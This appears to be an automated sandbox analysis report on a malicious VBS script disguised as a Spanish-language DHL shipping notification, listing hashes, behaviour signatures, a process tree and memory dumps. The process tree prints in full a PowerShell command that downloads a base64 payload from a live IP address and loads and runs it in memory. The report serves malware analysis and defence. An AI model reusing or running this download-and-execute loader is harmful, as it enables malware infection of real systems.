Analysis

  • max time kernel
    41s
  • max time network
    68s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2022 07:02

General

  • Target

    nueva notificación de envío de DHL.vbs

  • Size

    209KB

  • MD5

    88576ebcf941888f81b86e9289be3e61

  • SHA1

    05798a254c5a901f07def753fd465ae0234deca7

  • SHA256

    07cd45dbe94b262e5e4e3e750aefd021e49faf521d2c770b2c5d344222db2505

  • SHA512

    3935272b73be55ae31689514e8b77e90c1b618445259a55c9e3dd497a0bbf7100ac1492eeba60faf62b6d84a08bf364fa864dd357f0cb920c0502a66577ade0b

  • SSDEEP

    3072:eXFJliLfuE8ozlADw8auustFmbicHyAwOt4MYI2x75nehsqgB3F23st+Zn3F/Mvu:sliLfudcHyU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://4.204.233.44/DLL/NoStartUp.ppam

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\nueva notificación de envío de DHL.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.skzjbcbgghzjgj/42.021.871.591//:ptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2024

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1808-54-0x000007FEFB7C1000-0x000007FEFB7C3000-memory.dmp
    Filesize

    8KB

  • memory/2024-55-0x0000000000000000-mapping.dmp
  • memory/2024-57-0x000007FEF3350000-0x000007FEF3D73000-memory.dmp
    Filesize

    10.1MB

  • memory/2024-59-0x00000000026C4000-0x00000000026C7000-memory.dmp
    Filesize

    12KB

  • memory/2024-58-0x000007FEF27F0000-0x000007FEF334D000-memory.dmp
    Filesize

    11.4MB

  • memory/2024-60-0x000000001B740000-0x000000001BA3F000-memory.dmp
    Filesize

    3.0MB

  • memory/2024-61-0x00000000026CB000-0x00000000026EA000-memory.dmp
    Filesize

    124KB

  • memory/2024-62-0x00000000026C4000-0x00000000026C7000-memory.dmp
    Filesize

    12KB

  • memory/2024-63-0x00000000026CB000-0x00000000026EA000-memory.dmp
    Filesize

    124KB

  • memory/2024-64-0x00000000026C4000-0x00000000026C7000-memory.dmp
    Filesize

    12KB

  • memory/2024-65-0x00000000026CB000-0x00000000026EA000-memory.dmp
    Filesize

    124KB